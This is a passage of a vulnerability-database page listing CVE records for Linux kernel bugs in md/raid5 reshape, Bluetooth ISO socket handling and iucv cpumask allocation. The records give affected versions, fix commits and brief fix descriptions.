            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/raid5.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2c92f8c1c456d556f15cbf51667b385026b2e6a0",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "6b33c468d543f6a83de2d61f09fec74b27e19fd2",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "c384dd4f1fb3b14a2fd199360701cc163ea88705",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "bf0ff69a42a3d2d46876d0514ecf13dffc516666",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "3b33740c1750a39e046339ff9240e954f0156707",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "775a9ba16c9ffe98fe54ebf14e55d5660f2bf600",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "4811d6e5d9f4090c3e0ff9890eb24077108046ab",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            },
            {
              "lessThan": "305a5170dc5cf3d395bb4c4e9239bca6d0b54b49",
              "status": "affected",
              "version": "ec32a2bd35bd6b933a5db6542c48210ce069a376",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/raid5.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.30"
            },
            {
              "lessThan": "2.6.30",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: avoid BUG_ON() while continue reshape after reassembling\n\nCurrently, mdadm support --revert-reshape to abort the reshape while\nreassembling, as the test 07revert-grow. However, following BUG_ON()\ncan be triggerred by the test:\n\nkernel BUG at drivers/md/raid5.c:6278!\ninvalid opcode: 0000 [#1] PREEMPT SMP PTI\nirq event stamp: 158985\nCPU: 6 PID: 891 Comm: md0_reshape Not tainted 6.9.0-03335-g7592a0b0049a #94\nRIP: 0010:reshape_request+0x3f1/0xe60\nCall Trace:\n \u003cTASK\u003e\n raid5_sync_request+0x43d/0x550\n md_do_sync+0xb7a/0x2110\n md_thread+0x294/0x2b0\n kthread+0x147/0x1c0\n ret_from_fork+0x59/0x70\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nRoot cause is that --revert-reshape update the raid_disks from 5 to 4,\nwhile reshape position is still set, and after reassembling the array,\nreshape position will be read from super block, then during reshape the\nchecking of \u0027writepos\u0027 that is caculated by old reshape position will\nfail.\n\nFix this panic the easy way first, by converting the BUG_ON() to\nWARN_ON(), and stop the reshape if checkings fail.\n\nNoted that mdadm must fix --revert-shape as well, and probably md/raid\nshould enhance metadata validation as well, however this means\nreassemble will fail and there must be user tools to fix the wrong\nmetadata."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:33.261Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2c92f8c1c456d556f15cbf51667b385026b2e6a0"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b33c468d543f6a83de2d61f09fec74b27e19fd2"
        },
        {
          "url": "https://git.kernel.org/stable/c/c384dd4f1fb3b14a2fd199360701cc163ea88705"
        },
        {
          "url": "https://git.kernel.org/stable/c/bf0ff69a42a3d2d46876d0514ecf13dffc516666"
        },
        {
          "url": "https://git.kernel.org/stable/c/3b33740c1750a39e046339ff9240e954f0156707"
        },
        {
          "url": "https://git.kernel.org/stable/c/775a9ba16c9ffe98fe54ebf14e55d5660f2bf600"
        },
        {
          "url": "https://git.kernel.org/stable/c/4811d6e5d9f4090c3e0ff9890eb24077108046ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/305a5170dc5cf3d395bb4c4e9239bca6d0b54b49"
        }
      ],
      "title": "md/raid5: avoid BUG_ON() while continue reshape after reassembling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43914",
    "datePublished": "2024-08-26T10:11:19.763Z",
    "dateReserved": "2024-08-17T09:11:59.295Z",
    "dateUpdated": "2026-01-05T10:52:33.261Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42141 (GCVE-0-2024-42141)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 12:57

Title

Bluetooth: ISO: Check socket flag instead of hcon

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: ISO: Check socket flag instead of hcon This fixes the following Smatch static checker warning: net/bluetooth/iso.c:1364 iso_sock_recvmsg() error: we previously assumed 'pi->conn->hcon' could be null (line 1359) net/bluetooth/iso.c 1347 static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg, 1348 size_t len, int flags) 1349 { 1350 struct sock *sk = sock->sk; 1351 struct iso_pinfo *pi = iso_pi(sk); 1352 1353 BT_DBG("sk %p", sk); 1354 1355 if (test_and_clear_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) { 1356 lock_sock(sk); 1357 switch (sk->sk_state) { 1358 case BT_CONNECT2: 1359 if (pi->conn->hcon && ^^^^^^^^^^^^^^ If ->hcon is NULL 1360 test_bit(HCI_CONN_PA_SYNC, &pi->conn->hcon->flags)) { 1361 iso_conn_big_sync(sk); 1362 sk->sk_state = BT_LISTEN; 1363 } else { --> 1364 iso_conn_defer_accept(pi->conn->hcon); ^^^^^^^^^^^^^^ then we're toast 1365 sk->sk_state = BT_CONFIG; 1366 } 1367 release_sock(sk); 1368 return 0; 1369 case BT_CONNECTED: 1370 if (test_bit(BT_SK_PA_SYNC,

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/045669710464a21c6…
	https://git.kernel.org/stable/c/33fabef489169c6db…
	https://git.kernel.org/stable/c/596b6f081336e7776…

Impacted products

Vendor

Product

Version

Linux

Affected: fbdc4bc47268953c80853489f696e02d61f9a2c6 , < 045669710464a21c67e690ef14698fd71857cb11 (git)
Affected: fbdc4bc47268953c80853489f696e02d61f9a2c6 , < 33fabef489169c6db87843ef23351ed0d5e51ad8 (git)
Affected: fbdc4bc47268953c80853489f696e02d61f9a2c6 , < 596b6f081336e77764ca35cfeab66d0fcdbe544e (git)
Affected: c03a10bd5b6ccb22921e04bcddc987410df7e7a9 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.592Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/045669710464a21c67e690ef14698fd71857cb11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/33fabef489169c6db87843ef23351ed0d5e51ad8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/596b6f081336e77764ca35cfeab66d0fcdbe544e"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42141",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:53.613577Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:35.470Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/iso.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "045669710464a21c67e690ef14698fd71857cb11",
              "status": "affected",
              "version": "fbdc4bc47268953c80853489f696e02d61f9a2c6",
              "versionType": "git"
            },
            {
              "lessThan": "33fabef489169c6db87843ef23351ed0d5e51ad8",
              "status": "affected",
              "version": "fbdc4bc47268953c80853489f696e02d61f9a2c6",
              "versionType": "git"
            },
            {
              "lessThan": "596b6f081336e77764ca35cfeab66d0fcdbe544e",
              "status": "affected",
              "version": "fbdc4bc47268953c80853489f696e02d61f9a2c6",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "c03a10bd5b6ccb22921e04bcddc987410df7e7a9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/iso.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: ISO: Check socket flag instead of hcon\n\nThis fixes the following Smatch static checker warning:\n\nnet/bluetooth/iso.c:1364 iso_sock_recvmsg()\nerror: we previously assumed \u0027pi-\u003econn-\u003ehcon\u0027 could be null (line 1359)\n\nnet/bluetooth/iso.c\n1347 static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg,\n1348                             size_t len, int flags)\n1349 {\n1350         struct sock *sk = sock-\u003esk;\n1351         struct iso_pinfo *pi = iso_pi(sk);\n1352\n1353         BT_DBG(\"sk %p\", sk);\n1354\n1355         if (test_and_clear_bit(BT_SK_DEFER_SETUP,\n                                      \u0026bt_sk(sk)-\u003eflags)) {\n1356                 lock_sock(sk);\n1357                 switch (sk-\u003esk_state) {\n1358                 case BT_CONNECT2:\n1359                         if (pi-\u003econn-\u003ehcon \u0026\u0026\n                                     ^^^^^^^^^^^^^^ If -\u003ehcon is NULL\n\n1360                             test_bit(HCI_CONN_PA_SYNC,\n                                         \u0026pi-\u003econn-\u003ehcon-\u003eflags)) {\n1361                                 iso_conn_big_sync(sk);\n1362                                 sk-\u003esk_state = BT_LISTEN;\n1363                         } else {\n--\u003e 1364                         iso_conn_defer_accept(pi-\u003econn-\u003ehcon);\n                                                       ^^^^^^^^^^^^^^\n                                                       then we\u0027re toast\n\n1365                                 sk-\u003esk_state = BT_CONFIG;\n1366                         }\n1367                         release_sock(sk);\n1368                         return 0;\n1369                 case BT_CONNECTED:\n1370                         if (test_bit(BT_SK_PA_SYNC,"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:46.234Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/045669710464a21c67e690ef14698fd71857cb11"
        },
        {
          "url": "https://git.kernel.org/stable/c/33fabef489169c6db87843ef23351ed0d5e51ad8"
        },
        {
          "url": "https://git.kernel.org/stable/c/596b6f081336e77764ca35cfeab66d0fcdbe544e"
        }
      ],
      "title": "Bluetooth: ISO: Check socket flag instead of hcon",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42141",
    "datePublished": "2024-07-30T07:46:35.174Z",
    "dateReserved": "2024-07-29T15:50:41.189Z",
    "dateUpdated": "2025-05-04T12:57:46.234Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42094 (GCVE-0-2024-42094)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2026-01-05 10:51

Title

net/iucv: Avoid explicit cpumask var allocation on stack

Summary

In the Linux kernel, the following vulnerability has been resolved: net/iucv: Avoid explicit cpumask var allocation on stack For CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumask variable on stack is not recommended since it can cause potential stack overflow. Instead, kernel code should always use *cpumask_var API(s) to allocate cpumask var in config-neutral way, leaving allocation strategy to CONFIG_CPUMASK_OFFSTACK. Use *cpumask_var API(s) to address it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2b085521be5292016…
	https://git.kernel.org/stable/c/842afb47d84536fc9…
	https://git.kernel.org/stable/c/9dadab0db7d904413…
	https://git.kernel.org/stable/c/0af718a690acc089a…
	https://git.kernel.org/stable/c/d85ca8179a54ff8cf…
	https://git.kernel.org/stable/c/724e7965af0540792…
	https://git.kernel.org/stable/c/2d090c7f7be3b26fc…
	https://git.kernel.org/stable/c/be4e1304419c99a16…

Impacted products

Vendor

Product

Version

Linux

Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 2b085521be5292016097b5e7ca81b26be3f7098d (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 842afb47d84536fc976fece8fb6c54bea711ad1a (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 9dadab0db7d904413ea1cdaa13f127da05c31e71 (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 0af718a690acc089aa1bbb95a93df833d864ef53 (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < d85ca8179a54ff8cf1e1f8c3c9e3799831319bae (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 724e7965af054079242b8d6f7e50ee226730a756 (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < 2d090c7f7be3b26fcb80ac04d08a4a8062b1d959 (git)
Affected: 2356f4cb191100a5e92d537f13e5efdbc697e9cb , < be4e1304419c99a164b4c0e101c7c2a756b635b9 (git)

Linux

Affected: 2.6.21
Unaffected: 0 , < 2.6.21 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:27.638Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b085521be5292016097b5e7ca81b26be3f7098d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/842afb47d84536fc976fece8fb6c54bea711ad1a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9dadab0db7d904413ea1cdaa13f127da05c31e71"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0af718a690acc089aa1bbb95a93df833d864ef53"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d85ca8179a54ff8cf1e1f8c3c9e3799831319bae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/724e7965af054079242b8d6f7e50ee226730a756"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d090c7f7be3b26fcb80ac04d08a4a8062b1d959"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be4e1304419c99a164b4c0e101c7c2a756b635b9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42094",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:27.973708Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:49.342Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/iucv/iucv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2b085521be5292016097b5e7ca81b26be3f7098d",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "842afb47d84536fc976fece8fb6c54bea711ad1a",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "9dadab0db7d904413ea1cdaa13f127da05c31e71",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "0af718a690acc089aa1bbb95a93df833d864ef53",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "d85ca8179a54ff8cf1e1f8c3c9e3799831319bae",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "724e7965af054079242b8d6f7e50ee226730a756",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "2d090c7f7be3b26fcb80ac04d08a4a8062b1d959",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            },
            {
              "lessThan": "be4e1304419c99a164b4c0e101c7c2a756b635b9",
              "status": "affected",
              "version": "2356f4cb191100a5e92d537f13e5efdbc697e9cb",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/iucv/iucv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.21"
            },
            {
              "lessThan": "2.6.21",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.21",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/iucv: Avoid explicit cpumask var allocation on stack\n\nFor CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumask\nvariable on stack is not recommended since it can cause potential stack\noverflow.\n\nInstead, kernel code should always use *cpumask_var API(s) to allocate\ncpumask var in config-neutral way, leaving allocation strategy to\nCONFIG_CPUMASK_OFFSTACK.\n\nUse *cpumask_var API(s) to address it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:47.723Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2b085521be5292016097b5e7ca81b26be3f7098d"
        },
        {
          "url": "https://git.kernel.org/stable/c/842afb47d84536fc976fece8fb6c54bea711ad1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9dadab0db7d904413ea1cdaa13f127da05c31e71"
        },
        {
          "url": "https://git.kernel.org/stable/c/0af718a690acc089aa1bbb95a93df833d864ef53"
        },
        {
          "url": "https://git.kernel.org/stable/c/d85ca8179a54ff8cf1e1f8c3c9e3799831319bae"
        },
        {
          "url": "https://git.kernel.org/stable/c/724e7965af054079242b8d6f7e50ee226730a756"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d090c7f7be3b26fcb80ac04d08a4a8062b1d959"
        },
        {
          "url": "https://git.kernel.org/stable/c/be4e1304419c99a164b4c0e101c7c2a756b635b9"
        }
      ],
      "title": "net/iucv: Avoid explicit cpumask var allocation on stack",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42094",
    "datePublished": "2024-07-29T17:39:30.191Z",
    "dateReserved": "2024-07-29T15:50:41.172Z",
    "dateUpdated": "2026-01-05T10:51:47.723Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27012 (GCVE-0-2024-27012)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:17

Title

netfilter: nf_tables: restore set elements when delete set fails

Summary

